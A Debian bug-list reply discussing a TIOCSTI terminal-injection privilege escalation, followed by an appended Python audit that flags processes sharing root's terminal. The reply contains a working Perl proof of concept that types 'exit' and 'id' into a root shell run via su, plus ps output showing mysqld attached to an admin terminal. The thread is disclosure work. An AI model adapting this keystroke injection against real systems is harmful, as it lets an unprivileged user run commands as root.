Re: Bug#357561: privilege escalation hole
Daniel Leidert <daniel.leidert@wgdd.de> writes:
> Didn't know that special treating of terminal exploits.
Nor did I. Does anyone have a pointer to a discussion of this? I
assume it must have been discussed a few times already.
As a dumb user, I wasn't aware of the possibilities TIOCSTI gives you.
It was very interesting to see the effect of calling this perl script
from ~luser/.bashrc and then doing "su luser" in a root shell:
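#!/usr/bin/perl
require "sys/ioctl.ph";
# /dev/tty is the controlling terminal, still shared with the root shell
open(TTY, '/dev/tty');
foreach (split(//,"exit\nid\n")) {
    # TIOCSTI queues one character as if it had been typed on the terminal
    ioctl(TTY, TIOCSTI(), $_);
}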
I think I'll stop using su now ;-)
BTW, I noticed that mysql-server-5.0 also has a problem similar to
apache. This is the ps output after a recent "apt-get upgrade":
root 8458 0.0 0.0 3912 904 pts/3 S Feb28 0:00 /bin/sh /usr/bin/mysqld_safe
mysql 8495 0.0 0.3 126524 3780 pts/3 Sl Feb28 0:00 \_ /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --user=mysql --pid-file=/var/run/mysqld/mysqld.pid --ski
root 8496 0.0 0.0 2968 356 pts/3 S Feb28 0:00 \_ logger -p daemon.err -t mysqld_safe -i -t mysqld
Does the special treating of terminal exploits mean that this is not a
bug? Or should it be reported with a low severity? As opposed to
apache, normal users rarely have access to run their own code in mysql
context anyway, so exploiting this may be difficult.
Bjørn
--
Italian people are all satanic DAF drivers, huh? So, people are dying
every day?
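
Added example, not part of the original message: a Python audit that reads `ps aux` output and reports non-root processes whose controlling terminal is also attached to a root process, which is the situation the mysqld listing above shows. The sample rows are constructed and the function names are illustrative.

```python
"""Flag terminals shared by processes of different users (input: `ps aux` rows)."""
from collections import defaultdict

# Constructed sample in `ps aux` column order, modelled on the listing in the
# message: a root shell plus a daemon that kept the admin's pts after an upgrade.
SAMPLE = """\
root      8301  0.0  0.1   5200  1900 pts/3    Ss   Feb28   0:00 -bash
root      8458  0.0  0.0   3912   904 pts/3    S    Feb28   0:00 /bin/sh /usr/bin/mysqld_safe
mysql     8495  0.0  0.3 126524  3780 pts/3    Sl   Feb28   0:00 /usr/sbin/mysqld --user=mysql
daemon    2211  0.0  0.0   2100   400 ?        Ss   Feb27   0:00 /usr/sbin/atd
alice     9100  0.0  0.1   5200  1800 pts/5    Ss   Mar01   0:00 -bash
"""

def parse_ps_aux(text):
    """Yield (user, pid, tty, command) for each well-formed `ps aux` row."""
    for line in text.splitlines():
        cols = line.split(None, 10)  # 11th field is the command, spaces kept
        if len(cols) < 11 or not cols[1].isdigit():
            continue  # header or damaged line
        yield cols[0], int(cols[1]), cols[6], cols[10]

def shared_terminals(text):
    """Map tty -> [(user, pid, command)] where more than one user is attached."""
    by_tty = defaultdict(list)
    for user, pid, tty, cmd in parse_ps_aux(text):
        if tty not in ("?", "-"):  # "?" means no controlling terminal
            by_tty[tty].append((user, pid, cmd))
    return {tty: procs for tty, procs in by_tty.items()
            if len({u for u, _, _ in procs}) > 1}

def unprivileged_on_root_tty(text):
    """Non-root processes that share a terminal with at least one root process."""
    hits = []
    for tty, procs in sorted(shared_terminals(text).items()):
        if any(u == "root" for u, _, _ in procs):
            hits += [(tty, u, pid, cmd) for u, pid, cmd in procs if u != "root"]
    return hits

if __name__ == "__main__":
    for tty, user, pid, cmd in unprivileged_on_root_tty(SAMPLE):
        print(f"{tty}: pid {pid} ({user}) shares a terminal with root: {cmd}")
```

A daemon that appears here was started without detaching from the administrator's terminal; one that has called setsid() shows "?" in the TTY column and is skipped.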